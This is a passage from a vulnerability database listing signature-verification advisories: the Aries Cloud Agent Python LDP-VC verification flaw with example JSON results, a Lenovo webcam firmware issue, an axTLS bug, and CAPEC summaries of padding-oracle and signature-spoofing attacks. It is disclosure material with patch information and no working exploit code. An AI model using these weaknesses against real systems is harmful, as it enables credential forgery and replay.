      "The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969"
    ]
  },
  "credential_results": [
    {
      "verified": true,
      "document": {
        "@context": [
          "https://www.w3.org/2018/credentials/v1",
          "https://w3id.org/citizenship/v1"
        ],
        "type": [
          "VerifiableCredential",
          "PermanentResident"
        ],
        "issuer": "did:sov:EzcfrVw7Tveho5NjrmDWnd",
        "issuanceDate": "2023-11-18",
        "credentialSubject": {
          "type": [
            "PermanentResident"
          ],
          "id": "did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C",
          "givenName": "Bob",
          "familyName": "Builder",
          "gender": "Male",
          "birthCountry": "Bahamas",
          "birthDate": "1958-07-17"
        },
        "proof": {
          "type": "Ed25519Signature2018",
          "proofPurpose": "assertionMethod",
          "verificationMethod": "did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1",
          "created": "2023-11-18T21:39:56.988853+00:00",
          "jws": "eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA"
        }
      },
      "results": [
        {
          "verified": true,
          "proof": {
            "@context": [
              "https://www.w3.org/2018/credentials/v1",
              "https://w3id.org/citizenship/v1"
            ],
            "type": "Ed25519Signature2018",
            "proofPurpose": "assertionMethod",
            "verificationMethod": "did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1",
            "created": "2023-11-18T21:39:56.988853+00:00",
            "jws": "eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA"
          },
          "purpose_result": {
            "valid": true,
            "controller": {
              "@context": "https://w3id.org/security/v2",
              "id": "did:sov:EzcfrVw7Tveho5NjrmDWnd",
              "assertionMethod": [
                "did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1"
              ],
              "authentication": [
                {
                  "id": "did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1",
                  "type": "Ed25519VerificationKey2018",
                  "controller": "did:sov:EzcfrVw7Tveho5NjrmDWnd",
                  "publicKeyBase58": "8dMkWKZxsK7vS8sR4XgS7gWvRawPp5TMYVFvnU2RyXqo"
                }
              ],
              "verificationMethod": "did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1",
              "https://www.w3.org/ns/did#service": {
                "id": "did:sov:EzcfrVw7Tveho5NjrmDWnd#did-communication",
                "type": "did-communication",
                "https://www.w3.org/ns/did#serviceEndpoint": {
                  "id": "http://alice:3000"
                }
              }
            }
          }
        }
      ]
    }
  ],
  "errors": [
    "The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969"
  ]
}

The flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own.

This vulnerability has been present since the first implementation of support for JSON-LD W3C Verifiable Credential Data Model presentations, in Aries Cloud Agent Python release in 0.7.0.

All ACA-Py Users depending on W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs are impacted by this vulnerability.

Patches

This issue has been patched in version 0.10.5 and fixed in 0.11.0.

Workarounds

There is no workaround other upgrading to a patched/fixed version of ACA-Py.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "aries-cloudagent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.7.0"
            },
            {
              "fixed": "0.10.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "aries-cloudagent"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.11.0rc1"
            },
            {
              "fixed": "0.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-21669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-09T20:31:55Z",
    "nvd_published_at": "2024-01-11T06:15:44Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nWhen verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation `document.proof` was not factored into the final `verified` value (`true`/`false`) on the presentation record. Below is an example result from verifying a JSON-LD Presentation where there is an error noted in the processing (mismatched challenge), but the overall result is incorrectly `\"verified\": true`:\n\n```json\n{\n  \"verified\": true,\n  \"presentation_result\": {\n    \"verified\": false,\n    \"document\": {\n      \"@context\": [\n        \"https://www.w3.org/2018/credentials/v1\"\n      ],\n      \"type\": [\n        \"VerifiablePresentation\"\n      ],\n      \"verifiableCredential\": [\n        {\n          \"@context\": [\n            \"https://www.w3.org/2018/credentials/v1\",\n            \"https://w3id.org/citizenship/v1\"\n          ],\n          \"type\": [\n            \"VerifiableCredential\",\n            \"PermanentResident\"\n          ],\n          \"issuer\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n          \"issuanceDate\": \"2023-11-18\",\n          \"credentialSubject\": {\n            \"type\": [\n              \"PermanentResident\"\n            ],\n            \"id\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n            \"givenName\": \"Bob\",\n            \"familyName\": \"Builder\",\n            \"gender\": \"Male\",\n            \"birthCountry\": \"Bahamas\",\n            \"birthDate\": \"1958-07-17\"\n          },\n          \"proof\": {\n            \"type\": \"Ed25519Signature2018\",\n            \"proofPurpose\": \"assertionMethod\",\n            \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n            \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n            \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n          }\n        }\n      ],\n      \"proof\": {\n        \"type\": \"Ed25519Signature2018\",\n        \"proofPurpose\": \"authentication\",\n        \"verificationMethod\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n        \"created\": \"2023-11-18T21:39:59.188276+00:00\",\n        \"challenge\": \"ce0956d4-206d-4b69-a087-52bbb9ddaf1d\",\n        \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw\"\n      }\n    },\n    \"results\": [\n      {\n        \"verified\": false,\n        \"proof\": {\n          \"@context\": [\n            \"https://www.w3.org/2018/credentials/v1\"\n          ],\n          \"type\": \"Ed25519Signature2018\",\n          \"proofPurpose\": \"authentication\",\n          \"verificationMethod\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C#z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n          \"created\": \"2023-11-18T21:39:59.188276+00:00\",\n          \"challenge\": \"ce0956d4-206d-4b69-a087-52bbb9ddaf1d\",\n          \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..4ciLzT3oF-Ch9nngGVgI_fBNIo_RPPXzRuFXjMx4AdwVNM4ioeB3TNDbHsF7fPXANznkZR0bHceyvMN3-CUSAw\"\n        },\n        \"error\": \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\",\n        \"purpose_result\": {\n          \"valid\": false,\n          \"error\": \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n        }\n      }\n    ],\n    \"errors\": [\n      \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n    ]\n  },\n  \"credential_results\": [\n    {\n      \"verified\": true,\n      \"document\": {\n        \"@context\": [\n          \"https://www.w3.org/2018/credentials/v1\",\n          \"https://w3id.org/citizenship/v1\"\n        ],\n        \"type\": [\n          \"VerifiableCredential\",\n          \"PermanentResident\"\n        ],\n        \"issuer\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n        \"issuanceDate\": \"2023-11-18\",\n        \"credentialSubject\": {\n          \"type\": [\n            \"PermanentResident\"\n          ],\n          \"id\": \"did:key:z6MkrpbudRMUpTWSdqFcG2ytbYu2QQfgGFUf8GJpShR8Gy7C\",\n          \"givenName\": \"Bob\",\n          \"familyName\": \"Builder\",\n          \"gender\": \"Male\",\n          \"birthCountry\": \"Bahamas\",\n          \"birthDate\": \"1958-07-17\"\n        },\n        \"proof\": {\n          \"type\": \"Ed25519Signature2018\",\n          \"proofPurpose\": \"assertionMethod\",\n          \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n          \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n          \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n        }\n      },\n      \"results\": [\n        {\n          \"verified\": true,\n          \"proof\": {\n            \"@context\": [\n              \"https://www.w3.org/2018/credentials/v1\",\n              \"https://w3id.org/citizenship/v1\"\n            ],\n            \"type\": \"Ed25519Signature2018\",\n            \"proofPurpose\": \"assertionMethod\",\n            \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n            \"created\": \"2023-11-18T21:39:56.988853+00:00\",\n            \"jws\": \"eyJhbGciOiAiRWREU0EiLCAiYjY0IjogZmFsc2UsICJjcml0IjogWyJiNjQiXX0..eKdLMhKJkiVNzTKOEv14KyAFJnk8QX5MqXPmRE5OjQvwRNkeXk1lQRovhDhXKw154OrSqLHgfSNwBd3xfwuDCA\"\n          },\n          \"purpose_result\": {\n            \"valid\": true,\n            \"controller\": {\n              \"@context\": \"https://w3id.org/security/v2\",\n              \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n              \"assertionMethod\": [\n                \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\"\n              ],\n              \"authentication\": [\n                {\n                  \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n                  \"type\": \"Ed25519VerificationKey2018\",\n                  \"controller\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd\",\n                  \"publicKeyBase58\": \"8dMkWKZxsK7vS8sR4XgS7gWvRawPp5TMYVFvnU2RyXqo\"\n                }\n              ],\n              \"verificationMethod\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#key-1\",\n              \"https://www.w3.org/ns/did#service\": {\n                \"id\": \"did:sov:EzcfrVw7Tveho5NjrmDWnd#did-communication\",\n                \"type\": \"did-communication\",\n                \"https://www.w3.org/ns/did#serviceEndpoint\": {\n                  \"id\": \"http://alice:3000\"\n                }\n              }\n            }\n          }\n        }\n      ]\n    }\n  ],\n  \"errors\": [\n    \"The challenge is not as expected; challenge=ce0956d4-206d-4b69-a087-52bbb9ddaf1d, expected=328daf6e-f1f5-475a-944e-6446e7b3a969\"\n  ]\n}\n```\n\nThe flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own.\n\nThis vulnerability has been present since the first implementation of support for JSON-LD W3C Verifiable Credential Data Model presentations, in Aries Cloud Agent Python release in 0.7.0.\n\nAll ACA-Py Users depending on W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs are impacted by this vulnerability.\n\n### Patches\n\nThis issue has been patched in version [0.10.5](https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5) and fixed in [0.11.0](https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0).\n\n### Workarounds\n\nThere is no workaround other upgrading to a patched/fixed version of ACA-Py.",
  "id": "GHSA-97x9-59rv-q5pm",
  "modified": "2024-01-11T15:42:21Z",
  "published": "2024-01-09T20:31:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hyperledger/aries-cloudagent-python/security/advisories/GHSA-97x9-59rv-q5pm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hyperledger/aries-cloudagent-python/commit/0b01ffffc0789205ac990292f97238614c9fd293"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hyperledger/aries-cloudagent-python/commit/4c45244e2085aeff2f038dd771710e92d7682ff2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hyperledger/aries-cloudagent-python"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.10.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hyperledger/aries-cloudagent-python/releases/tag/0.11.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hyperledger Aries Cloud Agent Python result of presentation verification not checked for LDP-VC"
}

GHSA-98MW-G7W9-2XQQ

Vulnerability from github – Published: 2025-08-18 21:31 – Updated: 2025-08-18 21:31
VLAI
Details

A potential vulnerability was reported in the Lenovo 510 FHD and Performance FHD web cameras that could allow an attacker with physical access to write arbitrary firmware updates to the device over a USB connection.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-4371"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-18T20:15:29Z",
    "severity": "HIGH"
  },
  "details": "A potential vulnerability was reported in the Lenovo 510 FHD and Performance FHD web cameras that could allow an attacker with physical access to write arbitrary firmware updates to the device over a USB connection.",
  "id": "GHSA-98mw-g7w9-2xqq",
  "modified": "2025-08-18T21:31:19Z",
  "published": "2025-08-18T21:31:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4371"
    },
    {
      "type": "WEB",
      "url": "https://support.lenovo.com/us/en/product_security/LEN-194466"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-9955-WG6R-GGM9

Vulnerability from github – Published: 2022-05-14 01:37 – Updated: 2022-05-14 01:37
VLAI
Details

In sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification blindly trusts the declared lengths in the ASN.1 structure. Consequently, when small public exponents are being used, a remote attacker can generate purposefully crafted signatures (and put them on X.509 certificates) to induce illegal memory access and crash the verifier.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-16149"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-347"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-11-07T20:29:00Z",
    "severity": "MODERATE"
  },
  "details": "In sig_verify() in x509.c in axTLS version 2.1.3 and before, the PKCS#1 v1.5 signature verification blindly trusts the declared lengths in the ASN.1 structure. Consequently, when small public exponents are being used, a remote attacker can generate purposefully crafted signatures (and put them on X.509 certificates) to induce illegal memory access and crash the verifier.",
  "id": "GHSA-9955-wg6r-ggm9",
  "modified": "2022-05-14T01:37:56Z",
  "published": "2022-05-14T01:37:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16149"
    },
    {
      "type": "WEB",
      "url": "https://github.com/igrr/axtls-8266/commit/5efe2947ab45e81d84b5f707c51d1c64be52f36c"
    },
    {
      "type": "WEB",
      "url": "https://sourceforge.net/p/axtls/mailman/message/36459928"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

No mitigation information available for this CWE.

CAPEC-463: Padding Oracle Crypto Attack

An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.

CAPEC-475: Signature Spoofing by Improper Validation

An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.